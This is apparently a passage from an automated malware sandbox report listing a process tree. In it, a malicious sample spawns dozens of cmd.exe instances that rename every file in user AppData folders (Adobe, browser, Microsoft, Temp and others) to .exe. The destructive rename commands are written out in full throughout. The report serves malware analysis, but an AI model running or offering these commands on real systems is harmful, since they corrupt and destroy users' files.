          • cmd.exe (PID: 2804 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5268 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7912 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4748 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7196 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 2232 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2472 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1520 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7896 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2212 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4840 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6164 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5376 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3528 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7220 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7456 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5380 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2752 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3228 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4324 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7056 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cookie\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3976 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\blob_storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7260 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5012 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 1656 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6576 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Network\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 4224 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6620 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2252 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3340 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7876 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5336 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7176 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7668 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2892 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5548 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6168 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\ConnectedDevicesPlatform\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 676 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\D3DSCache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8100 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7912 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8076 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3032 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6984 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 1516 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PeerDistRepub\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4120 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\PlaceholderTileLogoFolder\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5820 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Publishers\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5444 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\SolidDocuments\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7860 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5376 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2636 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 5228 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7456 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5364 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3356 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 7232 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3592 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 2436 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 3440 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4568 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3840 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\AcroCef\DC\Acrobat\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 3812 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\{291AA914-A987-4CE9-BD63-0C0A92D435E5}\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6612 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\Acrobat_23.006.20320\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • cmd.exe (PID: 4228 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\S\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 8124 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Color\Profiles\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 5384 cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\*.*" "*.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
